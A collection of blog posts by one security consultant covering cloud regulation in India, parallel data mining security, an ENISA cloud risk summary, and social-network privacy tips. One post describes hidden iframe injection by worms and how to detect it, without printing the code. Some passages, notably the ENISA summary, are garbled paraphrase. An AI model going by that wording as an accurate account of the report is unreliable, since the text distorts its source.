TRAI’s initiative gripped on towards ‘Regulation on Cloud for Industry’..

Keeping this post as ‘short and crisp’ required for keeping up with stance of audience mindset on this blog, would just like to inform the conference with TRAI (Government of India) for ‘Regulatory Framework on cloud for Indian Industry’ was a grand success and TRAI’s vision towards achieving this giant leap in form of this baseline national regulation for cloud providers and subscribers is worth commending. I was one of the 21 consultants on for this national regulatory initiative representing whitehat’People’ – the open security consortium, on for Cloud Security and Governance.

Our focus was on the cloud security modules of the regulation and so we discussed seeing cloud as a security model and notified security issues / impact, with / utilizing cloud; with measures to contract them. Also a cloud security framework drafted and designed for having a through assessment and audit materialization was provided. When we speak of the framework, with respect to specified ‘2 layer control’ approach into the III phase framework, it constituted: Framework Governance and work flow, niche of Security Controls (controls I), and our mechanism consisting of sub phases on for integrating penetrable vectors to material audit considerations (controls II) and a protection approach.

More precisely, keeping the security facets of cloud in its way, we helped to form a plan that helps to decide:

  • What needs to be running
  • What can be temporarily disrupted
  • What should be deliberately disconnected
  • What additional security measures should be enabled
  • How to communicate all of the above in varied structures of Cloud
The conference also included discussions adhering to other aspects of Cloud including Interoperability, Legal concerns, Quality of service etc. TRAI’s expecting the regulation coming to force in within 6-8 months and so will be out with draft consultation papers which would see for the concerns – as a whole of both the providers and subscribers availing cloud services.
//Abhiraj

‘Parallelized’ Data Mining (PDM) Security..

Parallel Data Mining is currently attracting much research. Objects involved with ‘Parallel Data Mining’ include special type of entities with the ability to migrate from one processor to another where it can resume / initiate its execution. In this article we consider security issues that need to be addressed before these systems in general, and ‘parallelized systems’ in particular, can be a viable solution for a broad range of commercial tools.

In this section we will briefly describe some properties of these systems and more of parallelized systems. This is not intended to be a complete description of ‘anything and everything’ of the above mentioned topics. We try to focus on issues with possible security implications.

Here when we speak of ‘entities’ we mean an ‘object / process / matter / material / data stream’ that splashes some kind of independent, self-contained and certain ‘intelligence’. So now we believe I can say “An entity is often assumed to represent another entity, such as an integrated output of a classified cluster or some other organization or environment on whose behalf it is acting”. No single universal definition of entity exists, but there are certain widely agreed universal characteristics of entities, these include fluctuating ambiance/environment, autonomy, and elasticity.

  • Fluctuating Ambiance means that the entity receives tactile input from its environment and that it can perform actions which change the environment in some way.
  • Autonomy means that an entity is able to act without the direct intervention of other entities (or other objects), and that it has control over its own actions and internal state.
  • Elasticity can be defined to include the following properties:
    • Responsive: refers to an entities’ ability to perceive its environment and respond in a timely fashion to changes that occur in it;
    • Pro-active: entities’ are able to exhibit opportunistic, goal-driven behavior and take the initiative where appropriate;
    • Social: Entities should be able to interact, when appropriate, with other entities and humans in order to solve their own problems (like distributing instructions to various sects, assigning instructions to respective processors with respect to certain considerations etc.) and to help other entities with their activities.

A number of other attributes are sometimes discussed in the context of ‘Augur’. These include but are not limited to:

  • Rationale: The assumption that an event will not act in a manner that prevents it from accomplishing its goals and will always attempt to fulfill those goals.
  • Candor: The concept that an event will not ‘knowingly’ communicate false information.
  • Cordiality: An entity cannot have conflicting goals that either force it to transmit false information or to effect actions that cause its goals to be unfulfilled or impeded.
  • Mobility: The ability for an agent to move across networks and between different hosts to fulfill its goals.

Platforms or the desired infrastructure provide entities with environments in which they can execute. A platform typically also provides additional services, such as communication facilities, to the entities it is running. In order for entities to be able to form a useful parallel system where they can communicate and cooperate, certain functionality needs to be provided to the entities. This includes functionality to find other entities or find particular services. This can be implemented as services offered by other processes or services more integrated with the infrastructure itself. Examples of such services include facilitators, mediators, and matchmakers etc.

Security Issues w/t Parallel Data Mining

In this section we will discuss security issues based on the characteristics described as above:

1) Entity Execution: Naturally entities need to execute somewhere. A host and the immediate environment of an entity, is eventually accountable for the accurate execution and protection of the entity. This straight forward leads us to the question of where access control decisions should be performed and enforced. Does the entity contain all necessary logic and information required to decide if an incoming request is authentic (originating from its claimant) and if so, is it authorized (has the right to access the requested information or service)? Or can the agent rely on the platform for access control services? The environment might also need certain protection from the objects that it hosts. An event should, for example, be prevented from launching a denial of service attack through consuming all resources on a processor, thus preventing the host from carrying out other things (such as executing other events scheduled).

2) Fluctuating Ambiance: What the term ‘environment’ indicates is that it totally depends on the application and appears almost to be considerably arbitrary in with respect to events literature; it can for e.g. be the ‘International Network’ viz. Internet or the host on which the entity is executing. An entity is assumed to be ‘conscious’ of certain states or events in its environment. Depending on the ‘nature and origin’ of this information, its authenticity and availability need to be considered. If an event’s ‘environment’ is limited to the processor on which it is executing, no specific security measures might be necessary (assuming the host environment is difficult to be spoofed keeping in mind the ‘objective proportional to time’ ratio). The situation is however likely to be totally different if the event receives environment information from, or via, the Internet.

3) Autonomy: This property when combined with other features given to entities, can introduce serious security concerns. If an entity, for e.g., is given authority to perform an objective, it should not be possible for another ‘party’ to force the event into committing to something, it would not normally commit to. Neither should an event be able to make commitments it cannot fulfill. Hence, issues in around delegation need to be considered for ‘entities ➨ events’ / instructions. The autonomy property does not necessarily introduce any ‘new’ security concerns; this property is held by many existing systems. It is worth mentioning that worms or viruses also hold this property, which enables them to spread efficiently without requiring any (intentional or unintentional) objects interaction. The lesson it indicates is that powerful features can also be ‘remixed’ and used for malicious purposes if not properly controlled in a controlled environment.

4) Communication Botheration: Of the ‘Elasticity’ properties, social behavior is certainly interesting from a security point of view. This means that entities can communicate with other events. Just as an entities communication with its surroundings / environment needs to be protected, so does its communication with other events. The following security properties should be provided:

  • Confidentiality: Affirmation that communicated / proclaimed information is not accessible to unauthorized parties
  • Data integrity: Affirmation that communicated / proclaimed information cannot be switched over / shaped / manipulated by unauthorized parties without being detected;
    • Authentication of origin: Affirmation that communication is originating from its claimant;
    • Availability: Affirmation that communication reaches its intended recipient in a timely fashion (‘Secure Negotiation’ protocols play a HUGE role here);
    • Non-repudiation: Affirmation that the originating entity can be held responsible for its communications.

It’s a fact that “security usually comes at a cost”. Additional computing and communication resources are required by most solutions to the previously mentioned secure structured structures functionality. Therefore, security needs to be dynamic. A lot of times it makes sense to protect all communication within a system to the same level, as the actual negotiation of security mechanisms then ‘MAY’ be avoided. However, in a large scale parallelized data mining systems, security services and mechanisms need to be adjusted or tweaked to the purpose and nature of the communications of various applications with varying security requirements. Some implementations of varied architectures in the same niche assumes that security can be provided transparently by a lower layer i.e. adding it to data sects while distributing it to varied problems. This approach might be sufficient in closed or more precisely localized systems where the entities can trust each other and the sole concern is external malicious parties.

5) Maneuverability: The use of movable or mobile entities bumps a number of security concerns. Entities need protection from other entities and from the hosts on which they execute. Similarly, hosts need to be protected from entities and from other objects / parties (tools getting co-mingled with processes through varied form of injections and other vulnerable loopholes) that can communicate with the platform. The problems associated with the protection of hosts from malicious code are aptly understood. The problem posed by malicious hosts to entities and the environment seems more complex to solve. Since an entity is under the control of the executing host, the host can in principle do anything to the event and its code.

The particular objective of attack vectors that a malicious host can make / apprehend can be summarized as follows.

  • Observation of code, data and flow control.
  • Manipulation of code, data and flow control – including manipulating the route of an entity
  • Incorrect execution of code
  • Denial of execution – either in part of an event or whole
  • Masquerading as a different host
  • Eavesdropping and Manipulating other event communications

6) Rationality, Candor, and Cordiality: The meaning (from a security point of view) of these properties seems to be: “Events are well behaved and will never act in a malicious manner.” If we make this a bona fide requirement, then the required redundancy for such a system is likely to make the system useless. Affirmation that only information from trusted sources are acted upon and that events (or their initiators) can be held responsible for their actions, as well as monitoring and logging of event behavior, are mechanisms that can help in drafting a system where the implications of malicious events / entities can be minimized.

7) Identification and authentication: Identification is not primarily a security issue in itself; however, the means by which an entity is identified are likely to affect the way an entity can be authenticated i.e. if the labeling environment of an event gets knocked out or uncontrolled further actions would result the same. For example, an entity could simply be identified by something like a serial number, or its identity could be associated with its origin, owner, capabilities, or privileges. If identities are not permanent, security-related decisions cannot (more precisely should not) be made on the basis of an entities identity. While an entity’s identity is of major importance to certain applications and services, it is not needed in others. In fact, entities are likely to be ideal for providing anonymity to their initiators as they are independent pieces of code, possessing some degree of autonomy, and do not require direct third party interaction.

This article can also be viewed in here.

//Abhiraj

Interview with global Hackerspaces Project!

Recently I had an interview with the international hackerspaces project called ‘Talking Anthropology’ on  Hackerspace Signal with varied spectrum of subjects including Indian hacker Space, Standard Related Issues Of India,  Blackberry case scenarios and varied InfoSec topics such as electronic voting machines, biometrics and cyber warfare!

The focus of the interview lies basically in the situation of India concerning hacker spaces and subjects. What’s interesting for a wider pubic of the world were the efforts of Indian government for biometrical recognition of citizens, electronic voting, Indian Tech Industry in comparison, connection to national or international hacker conferences, state of the Indian hacker scene, relationships between/position of the hacker scene and the society,  net neutrality in India, examples of hacktivism (maybe nationalism motivated attacks against Pakistan) …  etc. which i had hands on during the interview on the Signal!

A detailed post on the Interview Topics for a gain on, in much detail for wider audience would be posted soon as soon I get out of my hectic schedule. Till then let me know what topics you would like me to discuss in detail!

The detailed interview can be heard , or be downloaded from hackerspaces archieve http://signal.hackerspaces.org/archive/. An update on this can also be found on hackerspaces blog at http://blog.hackerspaces.org/. The schedule of the broadcast can been seen at  http://hackerspaces.org/wiki/Signal/Schedule.
TA16 – Indian Hackers [62:50m]

//Abhiraj

LIGATT site vulnerable under basic injection technique!

It came to me as a utter surprise, when I saw LIGATT Security International’s site suffering from some of the very basic flaws which intend to embed any object into their portal.Actually, it does not seems ‘that good’ to gaze at a security firm with much reputation still persisting with a basic flaw in their web site.

The Flaw: ‘iFrame injection’

The iframe injection is an kind of injection of one or more iframe tags into a page’s content. The iframe can typically do many not-so-good things such as downloading an executable application that may contain a kind of malwares or so which may directly compromise a visitors system.

Its now one of the popular methods of loading malwares onto users PC’s without having them going to a compromised website. An IFrame (stands for “inline frame”) is just a way of loading one web page inside another, more commonly from a different server. Now this is one of those things which can be useful for building online applications. But malware writers can create the included page just ‘one pixel square’ – meaning you can’t even see it’s actually residing there – and obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6D%20%6C%72%61%6D%65%62%6F – leaving no obvious clue that it’s malicious.

Ways worms could inject, a class of iFrames aka hidden iframes to files

  • Server’s getting compromised : This is one of the most common way. Some of the websites residing in the same web server as your website may be compromised (or it may also be some vulnerabilities in ones web app. itself) that caused the web server to get compromised. Once the server is compromised, the worm automate itself spreading to rest other websites in the server.
  • Compromising through client side FTP : The worm may be residing in some/any of the client computers one use’s for accessing the ftp/control panel accounts of your hosting server. When you type in the credentials for the control panel or so the worm closemouthed reading the credentials access the portal and initiates infecting files found on the server. It adds the following code to all the index.* files.
To the html pages the following piece of code gets added:
To PHP pages it adds:

Detecting iFrame Injections

To detect a kind of iframe injections, one should look through the HTML what your web server is sending. Open a page in your browser and then look for iframe tags. Injections usually insert iframes that point to raw IP addresses (something like “64.76.7.101″) instead of domain names. Treat these as suspicious. Once you’ve found an iframe and have determined that it’s not legitimate, you have to remove it from the page or database it’s coming from. On a WordPress blog you simply edit the page in question and look for the “&lgt;iframe>?” and remove it.

Alas! hope that LIGATT rectifies these kinds of basic flaws in their portal thus withstanding its reputation.

This post can also be viewed here.

//Abhiraj

ENISA’s Risk Summary Of Cloud Computing

ENISA report on Cloud Security identified number of places where risk elements were identified viz. the report acknowledged 8 high risk items & 29 medium risk items in the varied areas ofPolicies & Organizational Risks, Technical Risks, Legal Risks, and Cloud Unspecific Risks. In summary, the identified elements labeled as *key risk’s* are briefed below:

1) Loss Of Governance: It’s giving Cloud infrastructure, client necessary seize control to the cloud provider and a number of issues which may effect security. But, at the same time service level agreement may not offer complete commitment to provide such services on the part of cloud provider, thus leaving a gap in the security defenses. Lack Of Governance’s a key issue here.

Vulnerabilities:

  • V34: Unclear Roles and Responsibilities.
  • V35: Poor enforcement of role definitions.
  • V21: Synchronizing responsibilities or contractual obligations to different stakeholders
  • V23: SLA clauses with conflicting promises to different stakeholders
  • V25: Audit or certification not available to consumers
  • V18: Lack of standard technologies and solutions
  • V22: Cross cloud applications creating hidden dependency
  • V29: Storing of data in multiple jurisdiction and lack of transparency about THIS
  • V14: No source escrow agreement
  • V16: No control on vulnerability assessment process
  • V26: Certification schemes not adapted to cloud infrastructures
  • V30: Lack of information on jurisdictions
  • V31: Lack of completeness and transparency in terms of use
  • V44: Unclear assets ownership

Affected Assets:

  • A1: Company reputation
  • A2: Customer trust
  • A3: Employee loyalty and experience
  • A5: Personal sensitive data
  • A6: Personal Data
  • A7: Personal Data: Critical
  • A9: Service delivery- real time services
  • A10: Service delivery

2)Lock In Situation: Also ‘Lock In Situation’ has been considered. This can be a little unoffered of the way of tools and procedures from the standard data, from an ‘as a service’ interface’s that could guarantee data application service portability.
This can make it difficult for customers to migrate from one provider to another, to migrate data and services back to an inhouse IT environment. It introduces the dependency on particular cloud providers for service provisions especially if data portability had the most fundamental aspect, not enabled.

3) Isolation failure: Which is comfortable because they are working mostly in multi-tenant environment and ‘share resources & they are defining characteristics of cloud computing’. This risk category covers the failure of mechanism, server install-age, memory, routing and reputation between different tenants. However, it should be considered that attacks result in a relational mechanism are still in mere risk and much more difficult for attackers to put in practice as compared to attacks on traditional operating system.

4) Compliance Risks: Of course one of the key parts is the compliance risks. Investment and saving certificates may pull a risk by migrating to the cloud if the cloud providers don’t provide evidence of their own compliance with relevant requirement. And also for cloud provider they will not permit audits by cloud customer. In certain case it also means that ‘If you are using a public cloud infrastructure’ implies a certain kind of compliance cannot be achieved (for example PCI).

Vulnerabilities:

  • V25: Audit or certification not available to consumers
  • V13: Lack of standard technologies and solutions
  • V29: Storage of data in multiple jurisdictions and lack od transparency about this.
  • V26 Certification scheme not adapted to cloud infrastructure
  • V30: Lack of information on jurisdiction
  • V31: lack of completeness and transparency in terms of use

Affected Assets:

  • A20: Certification

5) Management Interface Compromise: Now, it’s also a time that management interface compromise (MIC), may be an issue that customer management interfaces of a public cloud provides additional programmed effort’s of applications an increased with, especially when combined with remote access and web browser vulnerabilities.

6 & 7) Data protection & Insecure or incomplete data deletion: Of course Cloud Computing poses several data protection risks. For cloud providers and customers in some cases it may be difficult for the cloud customer to get ‘correct level’ of data protection at all and for example if you leave this cloud provider it must be guaranteed that you have a complete data deletion. When a request to delete cloud resources is made the well merged prevailing system may not result into wiping the data. Adequate, primary data deletion must be or could be impossible; either become extra copies of data for restore; but unavailable.

Vulnerabilities:

  • V30: Lack of information on jurisdiction
  • V29: Storage of data in multiple jurisdictions and lack od transparency about this.

Affected Assets:

  • A1: Company reputation
  • A2: Customer trust
  • A5: Personal sensitive data
  • A6: Personal Data
  • A7: Personal Data: Critical
  • A9: Service delivery- real time services
  • A10: Service delivery

8.) Malicious insider: So, and a lot point of testing outbound by an either risk, was malicious insider which vitiates, but lightly. Damage which may be caused by malicious insider is often far greater. Cloud architecture necessitates certain rules over extremely high risks for example: includes Custom Provider System Administrative & Manage Security Service Provider.

This post can also be viewed here.

//Abhiraj

Cloud Computing – It’s not ‘WHAT’ but ‘HOW’ we do things…

The concept of cloud itself is one of those things that certainly get lot of hype, but no matter how one looks at it, the fact remains that it’s been used on greater and greater numbers and is becoming a more important topic for people to understand and with that certainty, the security aspect of it also playing an important role. Including what does that means and how do people deal with it, is the topic that people have talked about. Yet, it’s still confusing for some and there is lot of uncertainty in this space.

Industry spend a few months, rustling over exactly how do we describe this ‘thing’ in a distinct way, specially to those people who have not been thinking about it. So, the numbers of definitions that exist are many and varied, yet the way one could look at this is, “Cloud Computing is not necessarily about ‘What’, it’s more about ‘how we do things’”. There is no need of new technology when it comes to cloud computing, as essentially most of it is existing technologies just ‘re-mixed’ and a real change in terms of, how consumers acquire that technology , how its provisioned in kind of internally, how it’s used and whether or not the consumer actually owns the computing technology that they are accessing. Also a great deal of what cloud is, was really kind of signaled and opened up from a market perspective by ‘Virtualization’ and the concept of abstracting applications from the physical infrastructure, really giving a hand to the enterprise understanding and opening their eyes, as well as bunch of vendors to be fair as to what the cloud can do. So ‘VMware’ clearly had an impact on the market and far another aspect of internet services that come from the consumer world have also kind of signaled the new model of computing and clearly Google has got the market and demonstrating what you can do with the scalable highly efficient infrastructure used to serve in and all of your application over the wire.
So, we could pile it up as there’s not much of work included yet, there are some new technologies specially around provisioning, scaling and measuring aspects of computing but the reality is we are changing a lot of ‘how people use computing’ and that’s a great way to think about cloud computing.

Another way to view Cloud is to think of the Spectrum. Many times its seen, lots of people querying around ‘how would they define Infrastructure as a Service’ (IaaS), ‘Platform as a Service’ (PaaS) & ‘Software as a Service’ (Saas)’ and as seen in today’s time they have just too many of ‘as a service’ acronyms, one of them being ‘XaaS’ which indicates ‘Everything as a service’. The best way to think about some of these things, or ways to identify what are you dealing with or making out which bucket it fits into, is to really look which layer of computing stack you are abstracting. Infrastructure guys (i.e. Infrastructure as a Service) really focus on core computing infrastructural level technologies. So looking at Amazon’s AWS, EC2 and S3, they are really taking a server and making that server into an abstracted entity that you can access over the wire as well as the disk drives. So, they are completely going after the compute ware and there are companies like ‘Gogrid’ who is doing the same thing lying within the Microsoft framework. We can see many other firms coming up into this category such as Linode, Rackspace etc. When we move up to ‘Platform as a Service’ , one is really making the decision of application framework, that one is looking at and actually people need to understand this, that when they approach ‘Platform as a Service’, they are making a very strategic decision about how they are going to architect whatever application they are going to run and if they make the choice to give it a ‘Force.com’ or ‘Azure’ or ‘AppEngine’ or an ‘Engine Yard’ it’s known they are really getting married to this platform. So, in a way we could call ‘Platform as a Service’ as one of the most interesting areas of cloud computing market. And the last area ‘Software as a Service’, clearly shows what these guys are bringing in, is that layer of business logic on top of the application framework, are really driving business values. It signifies that it really speaks to the fact that, this is where the translation of computing into value for the business occurs and that’s why tremendous action is seen with lot of excess marketplace. Moreover, if one lookup the startups as well some established players playing, the growth of this marketplace is pretty significant.

# This published post can also be viewed here.
[+] This post is a part of my ongoing research paper on ‘Cloud Computing: Privacy & Security’.

//Abhiraj

Social Networking: Privacy and Security…

According to the reports on daily journals & magazines, some countable group of ‘US privacy and consumer protection groups’ filed a complaint with US Federal Trade Commission (FTC) accusing Facebook of “unfair and deceptive” practices. Moreover, they called on the FTC to further investigate Facebook’s privacy practices and force it to take steps to guard better against security breaches.

Above this, daily getting multiple queries on ‘accounts getting hacked’,’identity thefts’,’spreading hoax aka spams’ through the social networking portals… The sole thing i would like to say as a Security consultant as well as a, well versed Web 2/3.0 user is, *You could never get hacked by anyone, till you let it…*, as the techniques perpetrators use, to get through your account, is ‘your’ online published captivating content about yourselves and a bit of ‘social engineering tactics’ which informally means, “To indulge a user with fake identity, to gain user’s ‘trust’ and aftermath getting valued information through continuous interaction from the user”.

In response to the complaints by various ‘consumer protection groups’, the social networking company has added several new security tools to help prevent hacking and increased privacy options. Yet, no matter what FTC finds or what social networking firms add up, a perfectly better approach to ‘user security and privacy’ would be to ensure whether the users are aware of social networking risks and accountable for what types of information are they willingly sharing.

Some general best practices added with some instigating common sense that users should get aware with, includes:

  • Keeping your ‘personal information’ to yourself: Never post your ‘full name’, social security number, address, phone-number, and other credential numbers beholding your accounts or other personal objects. Be cautious about posting information that could be used to identify you offline (school, college, work place etc…).
  • Post only those information that you are comfortable with others seeing and knowing about you. Keep in mind many people can see your page (except your accepted friends).
  • Remember that once you post the information online, you can’t remove it. Even if you delete the information from a site, older versions exist on other machines and cache mainframes.
  • Read the Privacy Guide of Social networking portals. At the bottom of every page, there would be a link for “Privacy”. This page contains the latest privacy functions and policies set up by the firms which helps you ensuring your privacy settings setup.
  • Choose your ‘Friends’ carefully. Once you have accepted someone as your friend, they will have access to any information about you (including photographs) ‘that you have marked as viewable by your friends’.

Organizations, corporates and institutions should also find better ways to provide ongoing safety awareness, to people understand escalating risks and threats lurking online if they are willingly sharing too much credential information which may captivate intruders.

Individual users need to be more accountable for securing their sensitive and personal credentials. Is it a ‘networking portal’s’ responsibility, if users decide to post their ‘valuable credentials’ or share their credit card number online?

#This published post can also be viewed here.

//Abhiraj